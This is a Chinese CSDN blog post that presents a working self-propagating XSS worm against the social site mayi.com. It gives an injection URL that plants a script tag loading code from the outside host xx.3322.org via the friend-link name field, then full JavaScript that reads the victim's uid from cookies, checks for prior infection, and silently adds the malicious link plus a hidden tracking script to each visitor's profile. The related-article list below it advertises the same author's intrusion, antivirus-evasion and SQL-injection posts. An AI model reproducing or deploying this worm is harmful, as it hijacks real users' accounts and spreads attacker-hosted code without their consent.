蚂蚁网蠕虫

最新推荐文章于 2020-08-06 11:29:31 发布
最新推荐文章于 2020-08-06 11:29:31 发布
阅读量619 收藏
点赞数
分类专栏: 黑软 文章标签: xmlhttprequest function ajax url cookies dos
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhdd1234/article/details/4641370
版权

nowish
网址:http://www.mayi.com/
在空间设置–>友情链接–>名称中,可以加入Js代码,要实现蠕虫的功能,就要自动加链接,刚好找到一个GET的方法:

http://www.mayi.com/ajax/links.aspx?action=add&title=baidu%253Cscript%2Fsrc%253Dhttp%253A%2F%2Fxx.3322.org%2Fmayi%2Fa.js%253E%253C%2Fscript%253E&url=http%253A%2F%2Fwww.gg.com
但是在这里会一直加,貌似有DOS的意思,所以只加一次的方法判断是否已经感染,如果是就不加勒。下面直接放代码。不用问我,我也看不懂。

var id=getid();
var check=check();
function getid()
{
var cookie = document.cookie;
var cook = cookie.split(";");
var x = cookie.indexOf("uid");
var y = cookie.indexOf(":");
var id = cookie.substring(x + 4, y);
return id;
}//从cookies中分离出id,这个id会在check()函数中用到
function ajax()
{
    var _xmlhttp;
    try {
        _xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
    }
    catch (e) {
        try {
            _xmlhttp=new XMLHttpRequest();
        }
        catch (e) {
            _xmlhttp=false;
        }
    }
    return _xmlhttp;
}
function check()
{   
var url = "http://www.mayi.com/people/"+id;
var xmlhttp = ajax();
xmlhttp.open(’get’, url, false);
    xmlhttp.send();
var page = xmlhttp.responseText;
    var check=page.indexOf("xx.3322.org");
    return check;
}//这个函数的功能是判断是否感染,可以看出是对比xx.3322.org这个字符串。
function postdata()
{   if (check == -1)
{
var url = "http://www.mayi.com/ajax/links.aspx?action=add&title=baidu%3Cscript/src%3Dhttp%3A//xx.3322.org/mayi/a.js%3E%3C/script%3E%3Cdiv%20style%3Ddisplay%3Anone%3E%3Cscript%20language%3Djavascript%20type%3Dtext/javascript%20src%3Dhttp%3A//js.users.51.la/xx.js%3E%3C/script%3E%3C/div%3E&url=http%253A%2F%2Fwww.baidu.com";
var xmlhttp = ajax();
xmlhttp.open(’get’, url, true);
xmlhttp.send();
}
}//ajax提交一个get,也就是增加一个友情链接。
postdata();

brock
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
java络爬虫
06-21
络爬虫(又被称为页蜘蛛,络机器人,在FOAF社区中间,更经常的称为页追逐者),是一种按照一定的规则,自动地抓取万维信息的程序或者脚本。另外一些不常使用的名字还有蚂蚁、自动索引、模拟程序或者蠕虫
络爬虫详解
顺其自然~专栏
07-15 7587
络爬虫(web crawler,又称为页蜘蛛,络机器人,在FOAF社区中间,更经常的称为页追逐者),是一种按照一定的规则,自动地抓取万维信息的程序或者脚本。另外一些不常使用的名字还有蚂蚁、自动索引、模拟程序或者蠕虫。 产生背景 随着络的迅速发展,万维成为大量信息的载体,如何有效地提取并利用这些信息成为一个巨大的挑战。搜索引擎(Search Engine),例如传统的通用搜索引擎AltaVista,Yahoo!和Google等,作为一个辅助人们检索信息的工具成为用户访问万维的入口和指南
络爬虫的实现
yong472727322的博客
03-04 2194
作者:Gupta, P. ; Johari, K. ; Linagay's Univ., India  文章发表在:  Emerging Trends in Engineering and Technology (ICETET), 2009 2nd International Conference on            pages 838~844 摘要-万维是一个通过H
使用Java实现络爬虫
Pannahouse的博客
01-24 291
络爬虫 络爬虫(又被称为页蜘蛛,络机器人,在FOAF社区中间,更经常的称为页追逐者),是一种按照一定的规则,自动地抓取万维信息的程序或者脚本。
络爬虫简单概述
qq_45046083的博客
08-06 2328
络爬虫 1、概念 ​ 络爬虫本质上就是一个程序 或者 脚本, 络爬虫按照一定规则获取互联中信息(数据), 一般来说爬虫被分为三大模块: 获取数据 解析数据 保存数据。 ​ 络爬虫(又称为页蜘蛛,络机器人,在FOAF社区中间,更经常的称为页追逐者),是一种按照一定的规则,自动地抓取万维信息的程序或者脚本。另外一些不常使用的名字还有蚂蚁、自动索引、模拟程序或者蠕虫。 2、爬虫价值 爬虫的价值本质就是获取数据的价值. 数据的价值越高, 爬虫的价值越高 数据的价值: 一切皆为数据
python络爬虫详解
最新发布
03-07
python爬虫 络爬虫(又称为页蜘蛛,络机器人,在FOAF社区中间,更经常的称为页追逐者),是一种按照一定的规则,自动地抓取万维信息的程序...另外一些不常使用的名字还有蚂蚁、自动索引、模拟程序或者蠕虫
络爬虫一种搜索引擎
06-30
另外一些不常使用的名字还有蚂蚁,自动索引,模拟程序或者蠕虫。 目录 概述 爬虫技术研究综述 页搜索策略 页分析算法 补充 展开 编辑本段概述  引言  随着络的迅速发展,万维成为大量信息的载体,...
络爬虫的设计与实现毕业设计(论文)
08-31
另外一些不常使用的名字还有蚂蚁,自动索引,模拟程序或者蠕虫络检索功能起于互联内容爆炸性发展所带来的对内容检索的需求。搜索 引擎不断的发展,人们的需求也在不断的提高,络信息搜索已经成为人们每天 都...
蜘蛛演示:络爬虫
02-21
另外一些不常使用的名字还有蚂蚁蚁,自动索引,模拟程序或蠕虫。爬虫的具体步骤: 1,数据采集,经过一定的逻辑和策略,循环抓取页上的数据,工作过程就像Ctrl + a-> Ctrl + c-> Ctrl + v; 2,解析,分析采集到的...
定位免杀NOD32的一些经验
zhdd1234的专栏
10-08 4695
----collect dying site:http://www.idying.cn欢迎大家一起讨论先说下定位方法:1  NOD32不能正向定位的,定位出来也是不能修改的!针对nod32应该选择反向定位,开始位置为400填充不一定是90 可以使任意的 现在填90有时候被干扰的2 使用排除法收集下目前免杀过NOD32的方法源码:1源码免杀的另类方法函数的延迟加载例:
139端口入侵简易教程
zhdd1234的专栏
09-27 2872
 一篇老文章了  net use //192.168.0.1/ipc$Content$nbsp;"" /user:administrator  提到139端口,我想知道的人一定非常多,本来是不想用写这个教程的,但考虑要照顾到新人,所以还是简单的写一下。  首先,连接的命令是:  netuse//IP地址/ipc$Content$lt;空格>密码/user:用户名  假设我要连接
资深程序员深度解密:福彩黑客案
zhdd1234的专栏
07-18 2500
我是一个程序设计者,以多年开发程序的经验,对深圳福彩中心黑客案进行一下分析:  1、疑犯算不上黑客,起码算不上高明的黑客  黑客侵入一台计算机并且安装了木马,就意味着对这台计算机拥有了控制权,(通常将这样的计算机称为肉鸡)。只要不暴露,黑客对肉鸡的控制可以一直持续到这台计算机重装操作系统。黑客,其实就是一些别有用心的程序高手。他们的主要作案工具就是“程序”。而程序一个最大的特点,就是可以无
制作图片木马教程
zhdd1234的专栏
09-15 2215
 何谓BMP页木马?它和过去早就用臭了的MIME头漏洞的木马不同,MIME木马是把一个EXE文件用MIME编码为一个EML(OUT LOOK信件)文件,放到页上利用IE和OE的编码漏洞实现自动下载和执行。  然而BMP木马就不同,它把一个EXE文件伪装成一个BMP图片文件,欺骗IE自动下载,再利用页中的JAVASCRIPT脚本查找客户端的Internet临时文件夹,找到下载后的BMP文件
各个端口的入侵总结 (1)
zhdd1234的专栏
08-08 1365
 21端口是默认的FTP端口,利用方式:弱口令探测/溢出  目前我还没看到远程溢出的,SERU的本地溢出漏洞风靡一时,曾经很多服务器就在沦丧于这个漏洞。  这个端口可以参照上的教程,就不多说了,下面的TELNET也是一样,扫描到了弱口令直接登陆上去。  22端口  22端口是SSH远程登录协议,利用方式:弱口令探测  23端口  23端口是TLENET的默认端口,利用方式
入侵无线
zhdd1234的专栏
07-11 1165
自从买了笔记本之后,无线卡经常会收到一些无线络,信号很强,但是都连不上去,要密码。难道只能看着流口水?那当然不会,要的就是免费上!  现在无线的加密方式主要有两种:WEP和WPA。目前来说,WPA的破解方式目前还仅限于穷举法,如果猜解字典里没有密码,那就束手无策。而WEP,只要数据包足够,就有机会破解出来  WEP是一种在接入点和客户端之间以“RC4”方式对分组信息进行加密的技术,密
怎样用中文去看外国的黑客
zhdd1234的专栏
10-08 954
大家是否想看看国外的黑客站,大家是否因为不懂外语而看不了国外黑客站点而烦恼。哼哼,你们知道我是怎么看国外站的。请看:首先当然要找到要看的站了,我这里就看“http://www.milw0rm.com/”然后打开google搜索的首页:G.cn然后搜索http://www.milw0rm.com/接着就出现了搜索结果找到址是http://www.milw0rm.com/的右上方有个“
手工SQL注入入侵
zhdd1234的专栏
09-15 718
检测可否注入  http://127.0.0.1/xx?id=11 and 1=1 (正常页面)  http://127.0.0.1/xx?id=11 and 1=2 (出错页面)  检测表段的  http://127.0.0.1/xx?id=11 and exists (select * from admin)  检测字段的  http://127.0.0.1/xx?id
黑软
zhdd1234的专栏
06-13 716
绕过验证码 http://www.anqn.com/article/a/2006-09-19/a0982290.shtml
java编写蠕虫病毒_蠕虫病毒代码分析
06-12
我很抱歉,我不能提供与恶意软件编写相关的信息。作为一名 AI,我的使命是为人类提供有益的帮助和服务,而不是促进不道德的行为或犯罪活动。恶意软件对于个人和组织都会造成巨大的损失和风险,这种行为是不道德的,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值